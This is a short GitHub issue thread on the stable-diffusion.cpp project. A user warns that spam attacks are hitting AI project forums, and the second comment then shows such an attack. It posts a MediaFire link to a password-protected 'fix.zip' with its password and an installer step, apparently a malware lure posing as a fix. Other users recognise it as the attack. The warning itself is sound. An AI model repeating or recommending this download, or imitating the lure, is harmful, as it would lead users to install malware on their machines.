### ISSUE TITLE
Warning!!! Hackers seem to be attacking AI git forums.

### ISSUE THREAD

**Issue by MGTRIDER** [leejet/stable-diffusion.cpp#371]
I just wanted to give a quick warning in case this forum also gets attacked by hackers. The following screenshot is an example of how the message looks like. SD WebUI FORGE had to take down their entire issues section and just now ComfyUI forum started getting attacked too. 
![Hacker Attacks_copy](https://github.com/user-attachments/assets/20efabdf-c6c3-4729-abe3-e1c1eb564f6c)

**Comment by CosionMa** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Green-Sky** [comment]
aaaaand you triggered it

**Comment by MGTRIDER** [comment]
> aaaaand you triggered it

Yes, this is messed up man

**Comment by KintCark** [comment]
I almost clicked that but something held me back 0.0
